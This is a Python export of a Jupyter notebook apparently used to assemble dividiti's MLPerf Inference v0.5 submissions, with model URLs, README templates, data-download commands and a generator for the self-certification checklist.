        "url" : "https://zenodo.org/record/3361502/files/ssd_mobilenet_v1_coco_2018_01_28.tar.gz",
        "width" : 300, "height" : 300,
        "provenance" : "Google",
    },
    'ssd-mobilenet-v1-non-quantized-mlperf' : {
        "name" : "MLPerf SSD-MobileNet quantized",
        "url" : "https://zenodo.org/record/3252084/files/mobilenet_v1_ssd_8bit_finetuned.tar.gz",
        "width" : 300, "height" : 300,
        "provenance" : "Habana"
    },
    'ssd-mobilenet-v1-fpn' : {
        "name" : "SSD-MobileNet-v1 FPN SBP",
        "url" : "http://download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03.tar.gz",
        "width" : 640, "height" : 640,
    },
    'ssd-resnet50-fpn' : {
        "name" : "SSD-ResNet50-v1 FPN SBP",
        "url" : "http://download.tensorflow.org/models/object_detection/ssd_resnet50_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03.tar.gz",
        "width" : 640, "height" : 640,
    },
    'ssdlite-mobilenet-v2' : {
        "name" : "SSDLite-MobileNet-v2",
        "url" : "http://download.tensorflow.org/models/object_detection/ssdlite_mobilenet_v2_coco_2018_05_09.tar.gz",
        "width" : 300, "height" : 300,
    },
    'yolo-v3' : {
        "name" : "YOLO-v3",
        "url" : "https://zenodo.org/record/3386327/files/yolo_v3_coco.tar.gz",
        "width" : 416, "height" : 416,
        "provenance" : "https://github.com/YunYang1994/tensorflow-yolov3/"
    }
}

# For each object detection implementation.
for implementation in [ 'mlperf-inference-vision' ]:
    for benchmark in object_detection_benchmarks.keys():
        implementation_benchmark = implementation+'-'+benchmark
        implementation_benchmarks[implementation_benchmark] = {
            "input_data_types": "fp32",
            "weight_data_types": "fp32",
            "retraining": "no",
            "starting_weights_filename": object_detection_benchmarks[benchmark]['url'],
#            "name" : object_detection_benchmarks[benchmark]['name'], # submission checker complains about "unknwon field name"
            "weight_transformations": "None (TensorFlow)"
        }

from pprint import pprint
# pprint(implementation_benchmarks)

# In[ ]:

# Per-implementation README.md contents for the submission tree.
implementation_readmes = {}
implementation_readmes['image-classification-tflite'] = """# MLPerf Inference - Image Classification - TFLite

This C++ implementation uses TFLite to run TFLite models for Image Classification on CPUs.

## Links
- [Jupyter notebook](https://nbviewer.jupyter.org/urls/dl.dropbox.com/s/1xlv5oacgobrfd4/mlperf-inference-v0.5-dividiti.ipynb)
- [Source code](https://github.com/ctuning/ck-mlperf/tree/master/program/image-classification-tflite-loadgen).
- [Instructions](https://github.com/mlperf/inference/blob/master/v0.5/classification_and_detection/optional_harness_ck/classification/tflite/README.md).
"""

implementation_readmes['image-classification-armnn-tflite'] = """# MLPerf Inference - Image Classification - ArmNN-TFLite

This C++ implementation uses ArmNN with the TFLite frontend to run TFLite models for Image Classification on Arm Cortex CPUs and Arm Mali GPUs.

## Links
- [Jupyter notebook](https://nbviewer.jupyter.org/urls/dl.dropbox.com/s/1xlv5oacgobrfd4/mlperf-inference-v0.5-dividiti.ipynb)
- [Source code](https://github.com/ctuning/ck-mlperf/tree/master/program/image-classification-armnn-tflite-loadgen).
- [Instructions](https://github.com/ARM-software/armnn-mlperf/blob/master/README.md).
"""

implementation_readmes['image-classification-tensorrt-loadgen-py'] = """# MLPerf Inference - Image Classification - TensorRT

This Python implementation uses TensorRT to run models Image Classification on Arm Cortex CPUs and Arm Mali GPUs.

### Links
- [Source code](https://github.com/ctuning/ck-mlperf/tree/master/program/image-classification-tensorrt-loadgen-py).
"""

implementation_readmes['mlperf-inference-vision'] = """# MLPerf Inference - Object Detection - TensorFlow

This Python implementation is the official MLPerf Inference vision application, modified to support other object detection models and run with TensorRT.

## Links
- [CK wrapper](https://github.com/ctuning/ck-object-detection/tree/master/program/mlperf-inference-vision).
- [vision_with_ck branch in dividiti's fork of mlperf/inference](https://github.com/dividiti/inference/tree/vision_with_ck).
- [Docker image with instructions](https://github.com/ctuning/ck-mlperf/tree/master/docker/mlperf-inference-vision-with-ck.tensorrt.ubuntu-18.04).
- [Jupyter notebook](https://nbviewer.jupyter.org/urls/dl.dropbox.com/s/1xlv5oacgobrfd4/mlperf-inference-v0.5-dividiti.ipynb)
"""

# In[ ]:

# Locate each implementation's CK program entry on disk via ck.access.
implementation_paths = {}
for implementation in [ 'image-classification-tflite', 'image-classification-armnn-tflite',
                        'image-classification-tensorrt-loadgen-py', 'mlperf-inference-vision' ]:
    implementation_uoa = implementation
    if implementation.startswith('image-classification'):
        # The TFLite-based program entries carry a '-loadgen' suffix.
        if implementation.endswith('tflite'):
            implementation_uoa += '-loadgen'
        repo_uoa = 'ck-mlperf'
    else:
        # TODO: move to ck-mlperf, then no need for special case.
        repo_uoa = 'ck-object-detection'
    r = ck.access({'action':'find', 'repo_uoa':repo_uoa, 'module_uoa':'program', 'data_uoa':implementation_uoa})
    if r['return']>0:
        print('Error: %s' % r['error'])
        exit(1)
    implementation_paths[implementation] = r['path']

# In[ ]:

# Per-division, per-task README.md contents for the measurements directories.
measurements_readmes = {}
task = 'image-classification'
for division_upper in [ 'Closed', 'Open' ]:
    division_lower = division_upper.lower()
    measurements_readmes[division_lower+'-'+task] = '''# MLPerf Inference - {} Division - Image Classification

We performed our measurements using automated, customizable, portable and reproducible
[Collective Knowledge](http://cknowledge.org) workflows. Our workflows automatically
install dependencies (models, datasets, etc.), preprocess input data in the correct way,
and so on.

## CK repositories

As CK is always evolving, it is hard to pin particular revisions of all repositories.

The most relevant repositories and their latest revisions on the submission date (11/Oct/2019):

- [ck-mlperf](https://github.com/ctuning/ck-mlperf) @ [ee77cfd](https://github.com/ctuning/ck-mlperf/commit/ee77cfd3ddfa30739a8c2f483fe9ba83a233a000) (contains programs integrated with LoadGen, model packages and scripts).
- [ck-env](https://github.com/ctuning/ck-env) @ [f9ac337](https://github.com/ctuning/ck-env/commit/f9ac3372cdc82fa46b2839e45fc67848ab4bac03) (contains dataset descriptions, preprocessing methods, etc.)
- [ck-tensorflow](https://github.com/ctuning/ck-tensorflow) @ [eff8bec](https://github.com/ctuning/ck-tensorflow/commit/eff8bec192021162e4a336dbd3e795afa30b7d26) (contains TFLite packages).
- [armnn-mlperf](https://github.com/arm-software/armnn-mlperf) @ [42f44a2](https://github.com/ARM-software/armnn-mlperf/commit/42f44a266b6b4e04901255f46f6d34d12589208f) (contains ArmNN/ArmCL packages).

## Links
- [Bash script](https://github.com/ctuning/ck-mlperf/tree/master/script/mlperf-inference-v0.5.{}.image-classification) used to invoke benchmarking on Linux systems or Android devices.
'''.format(division_upper, division_lower)

task = 'object-detection'
for division_upper in [ 'Closed', 'Open' ]:
    division_lower = division_upper.lower()
    measurements_readmes[division_lower+'-'+task] = '''# MLPerf Inference - {} Division - Object Detection

We performed our measurements using automated, customizable, portable and reproducible
[Collective Knowledge](http://cknowledge.org) workflows. Our workflows automatically
install dependencies (models, datasets, etc.), preprocess input data in the correct way,
and so on.

## CK repositories

As CK is always evolving, it is hard to pin particular revisions of all repositories.

The most relevant repositories and their latest revisions on the submission date (18/Oct/2019):
- [ck-mlperf](https://github.com/ctuning/ck-mlperf) @ [ef1fced](https://github.com/ctuning/ck-mlperf/commit/ef1fcedd495fd03b5ad6d62d62c8ba271854f2ad) (contains the CK program wrapper, MLPerf SSD-MobileNet model packages and scripts).
- [ck-object-detection](https://github.com/ctuning/ck-object-detection) @ [780d328](https://github.com/ctuning/ck-object-detection/commit/780d3288ec19656cb60c5ad39b2486bbf0fbf97a) (contains most model packages)
- [ck-env](https://github.com/ctuning/ck-env) @ [5af9fbd](https://github.com/ctuning/ck-env/commit/5af9fbd93ad6c6465b631716645ad9442a333442) (contains dataset descriptions, preprocessing methods, etc.)

## Links
- [Docker image with instructions](https://github.com/ctuning/ck-mlperf/tree/master/docker/mlperf-inference-vision-with-ck.tensorrt.ubuntu-18.04).
- [Bash script](https://github.com/ctuning/ck-mlperf/tree/master/script/mlperf-inference-v0.5.{}.object-detection) used to invoke benchmarking via the Docker image.
'''.format(division_upper, division_lower)

# In[ ]:

# Snapshot of https://github.com/dividiti/inference/blob/61220457dec221ed1984c62bd9d382698bd71bc6/v0.5/mlperf.conf
mlperf_conf_6122045 = '''
# The format of this config file is 'key = value'.
# The key has the format 'model.scenario.key'. Value is mostly int64_t.
# Model maybe '*' as wildcard. In that case the value applies to all models.
# All times are in milli seconds

*.SingleStream.target_latency = 10
*.SingleStream.target_latency_percentile = 90
*.SingleStream.min_duration = 60000
*.SingleStream.min_query_count = 1024

*.MultiStream.target_qps = 20
*.MultiStream.target_latency_percentile = 99
*.MultiStream.samples_per_query = 4
*.MultiStream.max_async_queries = 1
*.MultiStream.target_latency = 50
*.MultiStream.min_duration = 60000
*.MultiStream.min_query_count = 270336
ssd-resnet34.MultiStream.target_qps = 15
ssd-resnet34.MultiStream.target_latency = 66
gnmt.MultiStream.min_query_count = 90112
gnmt.MultiStream.target_latency = 100
gnmt.MultiStream.target_qps = 10
gnmt.MultiStream.target_latency_percentile = 97

*.Server.target_qps = 1.0
*.Server.target_latency = 10
*.Server.target_latency_percentile = 99
*.Server.target_duration = 0
*.Server.min_duration = 60000
*.Server.min_query_count = 270336
resnet50.Server.target_latency = 15
ssd-resnet34.Server.target_latency = 100
gnmt.Server.min_query_count = 90112
gnmt.Server.target_latency = 250
gnmt.Server.target_latency_percentile = 97

*.Offline.target_qps = 1.0
*.Offline.target_latency_percentile = 90
*.Offline.min_duration = 60000
*.Offline.min_query_count = 1
'''

# <a id="get"></a>
# ## Get the experimental data

# Download experimental data and add CK repositories as follows.
# <a id="get_image_classification_closed"></a>
# ### Image Classification - Closed (MobileNet, ResNet)

# #### `firefly`
# ```
# $ wget https://www.dropbox.com/s/3md826fk7k1taf3/mlperf.closed.image-classification.firefly.tflite-v1.15.zip
# $ ck add repo --zip=mlperf.closed.image-classification.firefly.tflite-v1.15.zip
#
# $ wget https://www.dropbox.com/s/jusoz329mhixpxm/mlperf.closed.image-classification.firefly.armnn-v19.08.neon.zip
# $ ck add repo --zip=mlperf.closed.image-classification.firefly.armnn-v19.08.neon.zip
#
# $ wget https://www.dropbox.com/s/08lzbz7jl2w5jhu/mlperf.closed.image-classification.firefly.armnn-v19.08.opencl.zip
# $ ck add repo --zip=mlperf.closed.image-classification.firefly.armnn-v19.08.opencl.zip
# ```

# #### `hikey960`
# ```
# $ wget https://www.dropbox.com/s/lqnffl6wbaeceul/mlperf.closed.image-classification.hikey960.tflite-v1.15.zip
# $ ck add repo --zip=mlperf.closed.image-classification.hikey960.tflite-v1.15.zip
#
# $ wget https://www.dropbox.com/s/6m6uv1d33yc82f8/mlperf.closed.image-classification.hikey960.armnn-v19.08.neon.zip
# $ ck add repo --zip=mlperf.closed.image-classification.hikey960.armnn-v19.08.neon.zip
#
# $ wget https://www.dropbox.com/s/bz56y4damfqggr8/mlperf.closed.image-classification.hikey960.armnn-v19.08.opencl.zip
# $ ck add repo --zip=mlperf.closed.image-classification.hikey960.armnn-v19.08.opencl.zip
# ```

# #### `rpi4`
# ```
# $ wget https://www.dropbox.com/s/ig97x9cqoxfs3ne/mlperf.closed.image-classification.rpi4.tflite-v1.15.zip
# $ ck add repo --zip=mlperf.closed.image-classification.rpi4.tflite-v1.15.zip
#
# $ wget https://www.dropbox.com/s/ohcuyes409h66tx/mlperf.closed.image-classification.rpi4.armnn-v19.08.neon.zip
# $ ck add repo --zip=mlperf.closed.image-classification.rpi4.armnn-v19.08.neon.zip
# ```

# #### `mate10pro`
# ```
# $ wget https://www.dropbox.com/s/r7hss1sd0268b9j/mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.zip
# $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.zip
#
# $ wget https://www.dropbox.com/s/iflzxbxcv3qka9x/mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.zip
# $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.zip
# ```
# **NB:** We aborted the ResNet accuracy experiment with TFLite, as it was estimated to take 17 hours.

# #### `mate10pro` (only for testing the checker)
# ##### BAD_LOADGEN
# ```
# $ wget https://www.dropbox.com/s/nts8e7unb7vm68f/mlperf.closed.image-classification.mate10pro.tflite-v1.13.mobilenet.BAD_LOADGEN.zip
# $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.tflite-v1.13.mobilenet.BAD_LOADGEN.zip
# ```
# ##### BAD_RESNET
# ```
# $ wget https://www.dropbox.com/s/bi2owxxpcfm6n2s/mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.BAD_RESNET.zip
# $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.BAD_RESNET.zip
#
# $ wget https://www.dropbox.com/s/t2o2elqdyitqlpi/mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.BAD_RESNET.zip
# $ ck add repo --zip=mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.BAD_RESNET.zip
# ```

# <a id="get_image_classification_open"></a>
# ### Image Classification - Open (MobileNets-v1,v2)

# #### `firefly`
# ```
# $ wget https://www.dropbox.com/s/q8ieqgnr3zn6w4y/mlperf.open.image-classification.firefly.tflite-v1.15.zip
# $ ck add repo --zip=mlperf.open.image-classification.firefly.tflite-v1.15.zip
#
# $ wget https://www.dropbox.com/s/zpenduz1i4qt651/mlperf.open.image-classification.firefly.tflite-v1.15.mobilenet-v1-quantized.zip
# $ ck add repo --zip=mlperf.open.image-classification.firefly.tflite-v1.15.mobilenet-v1-quantized.zip
#
# $ wget https://www.dropbox.com/s/3mmefvxc15m9o5b/mlperf.open.image-classification.firefly.armnn-v19.08.opencl.zip
# $ ck add repo --zip=mlperf.open.image-classification.firefly.armnn-v19.08.opencl.zip
#
# $ wget https://www.dropbox.com/s/hrupp4o4apo3dfa/mlperf.open.image-classification.firefly.armnn-v19.08.neon.zip
# $ ck add repo --zip=mlperf.open.image-classification.firefly.armnn-v19.08.neon.zip
# ```

# #### `hikey960`
# ```
# $ wget https://www.dropbox.com/s/2gbbpsd2pjurvc8/mlperf.open.image-classification.hikey960.tflite-v1.15.zip
# $ ck add repo --zip=mlperf.open.image-classification.hikey960.tflite-v1.15.zip
#
# $ wget https://www.dropbox.com/s/rmttjnxzih9snzh/mlperf.open.image-classification.hikey960.tflite-v1.15.mobilenet-v1-quantized.zip
# $ ck add repo --zip=mlperf.open.image-classification.hikey960.tflite-v1.15.mobilenet-v1-quantized.zip
#
# $ wget https://www.dropbox.com/s/m5illg8i2tse5hg/mlperf.open.image-classification.hikey960.armnn-v19.08.opencl.zip
# $ ck add repo --zip=mlperf.open.image-classification.hikey960.armnn-v19.08.opencl.zip
#
# $ wget https://www.dropbox.com/s/3cujqfe4ps0g66h/mlperf.open.image-classification.hikey960.armnn-v19.08.neon.zip
# $ ck add repo --zip=mlperf.open.image-classification.hikey960.armnn-v19.08.neon.zip
# ```

# #### `rpi4`
# ```
# $ wget https://www.dropbox.com/s/awhdqjq3p4tre2q/mlperf.open.image-classification.rpi4.tflite-v1.15.zip
# $ ck add repo --zip=mlperf.open.image-classification.rpi4.tflite-v1.15.zip
#
# $ wget https://www.dropbox.com/s/rf8vsg5firhjzf8/mlperf.open.image-classification.rpi4.tflite-v1.15.mobilenet-v1-quantized.zip
# $ ck add repo --zip=mlperf.open.image-classification.rpi4.tflite-v1.15.mobilenet-v1-quantized.zip
#
# $ wget https://www.dropbox.com/s/0oketvqml7gyzl0/mlperf.open.image-classification.rpi4.armnn-v19.08.neon.zip
# $ ck add repo --zip=mlperf.open.image-classification.rpi4.armnn-v19.08.neon.zip
# ```

# #### `mate10pro`
# ```
# $ wget https://www.dropbox.com/s/avi6h9m2demz5zr/mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet.zip
# $ ck add repo --zip=mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet.zip
#
# $ wget https://www.dropbox.com/s/soaw27zcjb8hhww/mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet-v1-quantized.zip
# $ ck add repo --zip=mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet-v1-quantized.zip
# ```
# **NB:** `mate10pro.tflite-v1.13.mobilenet` would have been a perfectly valid closed submission, just finished a little bit late after the deadline. `mate10pro.tflite-v1.13.mobilenet-quantized` is an open submission alright, as dividiti hadn't declared submitting quantized results before the deadline.

# <a id="get_object_detection_open"></a>
# ### Object Detection - Open

# #### `velociti`
# ```
# $ wget https://www.dropbox.com/s/wiea3a8zf077jsv/mlperf.open.object-detection.velociti.zip
# $ ck add repo --zip=mlperf.open.object-detection.velociti.zip
# ```

# <a id="checklist"></a>
# ## Generate the submission checklist

# In[ ]:


# %-format template for the per-submission self-certification checklist.
# Placeholders are filled in by get_checklist() below; literal percent signs
# in the checklist text are escaped as '%%'.
checklist_template = """MLPerf Inference 0.5 Self-Certification Checklist

Name of Certifying Engineer(s): %(name)s

Email of Certifying Engineer(s): %(email)s

Name of System(s) Under Test: %(system_name)s

Division (check one):
- [%(open)s] Open
- [%(closed)s] Closed

Category (check one):
- [%(category_available)s] Available
- [%(category_preview)s] Preview
- [%(category_rdi)s] Research, Development, and Internal (RDI)

Benchmark (check one):
- [%(benchmark_mobilenet)s] MobileNet
- [ ] SSD-MobileNet
- [%(benchmark_resnet)s] ResNet
- [ ] SSD-1200
- [ ] NMT
- [%(benchmark_other)s] Other, please specify: %(benchmark_other_specify)s

Please fill in the following tables adding lines as necessary:
97%%-tile latency is required for NMT only. 99%%-tile is required for all other models.

### Single Stream Results Table
| SUT Name | Benchmark | Query Count | Accuracy |
|----------|-----------|-------------|----------|
| %(system)s | %(benchmark)s | %(query_count)s | %(accuracy_pc)s%% |

### Multi-Stream Results Table
| SUT Name | Benchmark | Query Count |  Accuracy | 97%%-tile Latency | 99%%-tile Latency |
|----------|-----------|-------------|-----------|------------------|------------------|
|          |           |             |           |                  |                  |

### Server Results Table
| SUT Name | Benchmark | Query Count | Accuracy | 97%%-tile Latency | 99%%-tile Latency |
|----------|-----------|-------------|----------|------------------|------------------|
|          |           |             |          |                  |                  |

### Offline Results Table
| SUT Name | Benchmark | Sample Count | Accuracy | 
|----------|-----------|--------------|----------|
|          |           |              |          |

Scenario (check all that apply):
- [%(scenario_singlestream)s] Single-Stream
- [%(scenario_multistream)s] Multi-Stream
- [%(scenario_server)s] Server
- [%(scenario_offline)s] Offline

For each SUT, does the submission meet the latency target for each
combination of benchmark and scenario? (check all that apply)
- [x] Yes (Single-Stream and Offline no requirements)
- [ ] Yes (MobileNet x Multi-Stream 50 ms @ 99%%)
- [ ] Yes (MobileNet x Server 10 ms @ 99%%)
- [ ] Yes (SSD-MobileNet x Multi-Stream 50 ms @ 99%%)
- [ ] Yes (SSD-MobileNet x Server 10 ms @ 99%%)
- [ ] Yes (ResNet x Multi-Stream 50 ms @ 99%%)
- [ ] Yes (ResNet x Server 15 ms @ 99%%)
- [ ] Yes (SSD-1200 x Multi-Stream 66 ms @ 99%%).
- [ ] Yes (SSD-1200 x Server 100 ms @ 99%%)
- [ ] Yes (NMT x Multi-Stream 100 ms @ 97%%)
- [ ] Yes (NMT x Server 250 ms @ 97%%)
- [ ] No

For each SUT, is the appropriate minimum number of queries or samples met,
depending on the Scenario x Benchmark? (check all that apply)
- [x] Yes (Single-Stream 1,024 queries)
- [ ] Yes (Offline 24,576 samples)
- [ ] Yes (NMT Server and Multi-Stream 90,112 queries)
- [ ] Yes (Image Models Server and Multi-Stream 270,336 queries)
- [ ] No

For each SUT and scenario, is the benchmark accuracy target met? (check all that apply)
- [%(mobilenet_accuracy_met)s] Yes (MobileNet 71.68%% x 98%%)
- [ ] Yes (SSD-MobileNet 0.22 mAP x 99%%)
- [%(resnet_accuracy_met)s] Yes (ResNet 76.46%% x 99%%)
- [ ] Yes (SSD-1200 0.20 mAP x 99%%)
- [ ] Yes (NMT 23.9 BLEU x 99%%)
- [%(accuracy_not_met)s] No

For each SUT and scenario, did the submission run on the whole
validation set in accuracy mode? (check one)
- [x] Yes
- [ ] No

How many samples are loaded into the QSL in performance mode?
%(performance_sample_count)s

For each SUT and scenario, does the number of loaded samples in the
QSL in performance mode meet the minimum requirement?  (check all that apply)
- [%(performance_sample_count_1024)s] Yes (ResNet and MobileNet 1,024 samples)
- [%(performance_sample_count_256)s] Yes (SSD-MobileNet 256 samples)
- [%(performance_sample_count_64)s] Yes (SSD-1200 64 samples)
- [ ] Yes (NMT 3,903,900 samples)
- [%(performance_sample_count_not_met)s] No

For each SUT and scenario, is the experimental duration greater than
or equal to 60 seconds?  (check one)
- [x] Yes
- [ ] No

Does the submission use LoadGen? (check one)
- [x] Yes
- [ ] No

Is your loadgen commit from one of these allowed commit hashes?
- [%(revision_61220457de)s] 61220457dec221ed1984c62bd9d382698bd71bc6
- [%(revision_5684c11e39)s] 5684c11e3987b614aae830390fa0e92f56b7e800
- [%(revision_55c0ea4e77)s] 55c0ea4e772634107f3e67a6d0da61e6a2ca390d
- [%(revision_d31c18fbd9)s] d31c18fbd9854a4f1c489ca1bc4cd818e48f2bc5
- [%(revision_1d0e06e54a)s] 1d0e06e54a7d763cf228bdfd8b1e987976e4222f
- [%(revision_other)s] Other, please specify: %(revision_other_specify)s

Do you have any additional change to LoadGen? (check one)
- [ ] Yes, please specify:
- [x] No

Does the submission run the same code in accuracy and performance
modes? (check one)
- [x] Yes
- [ ] No

Where is the LoadGen trace stored? (check one)
- [x] Host DRAM
- [ ] Other, please specify:

For the submitted result, what is the QSL random number generator seed?
- [x] 0x2b7e151628aed2a6ULL (3133965575612453542)
- [ ] Other, please specify:

For the submitted results, what is the sample index random number generator seed?
- [x] 0x093c467e37db0c7aULL (665484352860916858)
- [ ] Other, please specify:

For the submitted results, what is the schedule random number generator seed?
- [x] 0x3243f6a8885a308dULL (3622009729038561421)
- [ ] Other, please specify:

For each SUT and scenario, is the submission run the correct number
of times for the relevant scenario? (check one)
- [x] Yes (Accuracy 1x Performance 1x Single-Stream, Multi-Stream, Offline)
- [ ] Yes (Accuracy 1x Performance 5x Server)
- [ ] No

Are the weights calibrated using data outside of the calibration set?
(check one)
- [ ] Yes
- [x] No

What untimed pre-processing does the submission use? (check all that apply)
- [x] Resize
- [ ] Reorder channels or transpose
- [ ] Pad
- [x] A single crop
- [x] Mean subtraction and normalization
- [ ] Convert to whitelisted format
- [ ] No pre-processing
- [ ] Other, please specify:

What numerics does the submission use? (check all that apply)
- [ ] INT4
- [ ] INT8
- [ ] INT16
- [%(numerics_uint8)s] UINT8
- [ ] UINT16
- [ ] FP11
- [ ] FP16
- [ ] BF16
- [%(numerics_fp32)s] FP32
- [ ] Other, please specify:

Which of the following techniques does the submission use? (check all that apply)
- [ ] Wholesale weight replacement
- [ ] Weight supplements
- [ ] Discarding non-zero weight elements
- [ ] Pruning
- [ ] Caching queries
- [ ] Caching responses
- [ ] Caching intermediate computations
- [ ] Modifying weights during the timed portion of an inference run
- [ ] Weight quantization algorithms that are similar in size to the
non-zero weights they produce
- [ ] Hard coding the total number of queries
- [ ] Techniques that boost performance for fixed length experiments but
are inapplicable to long-running services except in the offline
scenario
- [ ] Using knowledge of the LoadGen implementation to predict upcoming
lulls or spikes in the server scenario
- [ ] Treating beams in a beam search differently. For example,
employing different precision for different beams
- [ ] Changing the number of beams per beam search relative to the reference
- [ ] Incorporating explicit statistical information about the performance or accuracy sets
- [ ] Techniques that take advantage of upsampled images.
- [ ] Techniques that only improve performance when there are identical samples in a query.
- [x] None of the above

Is the submission congruent with all relevant MLPerf rules?
- [x] Yes
- [ ] No

For each SUT, does the submission accurately reflect the real-world
performance of the SUT?
- [x] Yes
- [ ] No"""

def get_checklist(checklist_template=checklist_template, name='Anton Lokhmotov', email='anton@dividiti.com',
                  system='rpi4-tflite-v1.15', system_name='Raspberry Pi 4 (rpi4)', revision='61220457de',
                  division='closed', category='available', task='image-classification', benchmark='mobilenet',
                  scenario='singlestream', performance_sample_count=1024, performance_sample_count_met=True,
                  accuracy_pc=12.345, accuracy_met=True, numerics='fp32'):
    """Render the self-certification checklist for one (system, benchmark, scenario).

    Fills `checklist_template` from the given submission metadata, prints the
    result (framed by separator lines, for notebook inspection) and returns it.

    Notes:
    - For 'mobilenet' and 'resnet', `accuracy_met` is recomputed from
      `accuracy_pc` against the MLPerf targets (71.676% x 98% and 76.456% x 99%
      respectively), overriding the argument; for other benchmarks the passed
      `accuracy_met` is honoured but also requires `accuracy_pc` > 0.
    - `performance_sample_count_met` is only used for the final "No" tick;
      see the TODO below.
    """
    def tick(var): return "x" if var else " "
    print("=" * 100)
    print(system)
    print("=" * 100)
    # Anything not in the allowed lists goes into the "Other, please specify" rows.
    revision_other = revision not in [ '61220457de', '5684c11e39', '55c0ea4e77', 'd31c18fbd9', '1d0e06e54a' ]
    benchmark_other = benchmark not in [ 'mobilenet', 'resnet']
    if benchmark=='mobilenet':
        accuracy_met = accuracy_pc >= 71.676*0.98
    elif benchmark=='resnet':
        accuracy_met = accuracy_pc >= 76.456*0.99
    else:
        accuracy_met = accuracy_met and accuracy_pc > 0
    checklist = checklist_template % {
        "name" : name,
        "email" : email,
        "system_name": system_name,
        # Division.
        "closed" : tick(division=='closed'),
        "open" : tick(division=='open'),
        # Category.
        "category_available" : tick(category.lower()=='available'),
        "category_preview" : tick(category.lower()=='preview'),
        "category_rdi" : tick(category.lower()=='rdi'),
        # Benchmark.
        "benchmark_mobilenet": tick(benchmark=='mobilenet'),
        "benchmark_resnet": tick(benchmark=='resnet'),
        "benchmark_other": tick(benchmark_other),
        "benchmark_other_specify": benchmark if benchmark_other else '',
        # Table.
        "system" : system,
        "benchmark" : benchmark,
        # Validation-set sizes: ImageNet 2012 (50,000) vs COCO 2017 val (5,000).
        "query_count": 50000 if task=='image-classification' else 5000,
        "accuracy_pc" : "%.3f" % accuracy_pc,
        # Scenario.
        "scenario_singlestream": tick(scenario=='singlestream'),
        "scenario_multistream": tick(scenario=='multistream'),
        "scenario_server": tick(scenario=='server'),
        "scenario_offline": tick(scenario=='offline'),
        # Accuracy.
        "mobilenet_accuracy_met" : tick(benchmark=='mobilenet' and accuracy_met),
        "resnet_accuracy_met" : tick(benchmark=='resnet' and accuracy_met),
        "accuracy_not_met" : tick(not accuracy_met),
        # "How many samples are loaded into the QSL in performance mode?"
        "performance_sample_count": performance_sample_count,
        "performance_sample_count_1024": tick(performance_sample_count==1024),
        "performance_sample_count_256": tick(performance_sample_count==256),
        "performance_sample_count_64": tick(performance_sample_count==64),
        "performance_sample_count_not_met": tick(not performance_sample_count_met), # TODO
        # LoadGen revision.
        "revision_61220457de": tick(revision=='61220457de'),
        "revision_5684c11e39": tick(revision=='5684c11e39'),
        "revision_55c0ea4e77": tick(revision=='55c0ea4e77'),
        "revision_d31c18fbd9": tick(revision=='d31c18fbd9'),
        "revision_1d0e06e54a": tick(revision=='1d0e06e54a'),
        "revision_other": tick(revision_other),
        "revision_other_specify": revision if revision_other else '',
        # Numerics.
        "numerics_uint8": tick(numerics=='uint8'),
        "numerics_fp32": tick(numerics=='fp32'),
    }
    print(checklist)
    print("-" * 100)

    return checklist

# null = get_checklist(system='rpi4-armnn-v19.08-neon', system_name='Raspberry Pi 4 (rpi4)', benchmark='mobilenet', accuracy_pc=70.241, numerics='uint8')
# null = get_checklist(system='hikey960-tflite-v1.15', system_name='Linaro HiKey 960 (hikey960)', benchmark='resnet', accuracy_pc=75.692, revision='deadbeef')
null = get_checklist(system='velociti-tensorflow-v1.14-cpu', name='Anton Lokhmotov; Emanuele Vitali',
                     email='anton@dividiti.com; emanuele.vitali@polimi.it',
                     system_name='HP Z640 G1X62EA workstation (velociti)',
                     division='open', category='RDI', benchmark='ssd-mobilenet-fpn')


# <a id="check"></a>
# ## Check the experimental data

# In[ ]:


#
# Image Classification - Closed (MobileNet, ResNet).
# repos_image_classification_closed = [ # firefly 'mlperf.closed.image-classification.firefly.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/18 'mlperf.closed.image-classification.firefly.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/21 'mlperf.closed.image-classification.firefly.armnn-v19.08.opencl', #https://github.com/mlperf/submissions_inference_0_5/pull/22 # hikey960 'mlperf.closed.image-classification.hikey960.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/23 'mlperf.closed.image-classification.hikey960.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/24 'mlperf.closed.image-classification.hikey960.armnn-v19.08.opencl', # https://github.com/mlperf/submissions_inference_0_5/pull/25 # rpi4 'mlperf.closed.image-classification.rpi4.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/26/ 'mlperf.closed.image-classification.rpi4.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/30 # mate10pro 'mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/32 'mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl', # https://github.com/mlperf/submissions_inference_0_5/pull/35 ] repos_image_classification_closed_audit = [ 'mlperf.closed.image-classification.firefly.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/234 'mlperf.closed.image-classification.hikey960.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/236 'mlperf.closed.image-classification.rpi4.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/238 #'mlperf.closed.image-classification.mate10pro.audit', ] # # Image Classification - Open (MobileNets-v1,v2). 
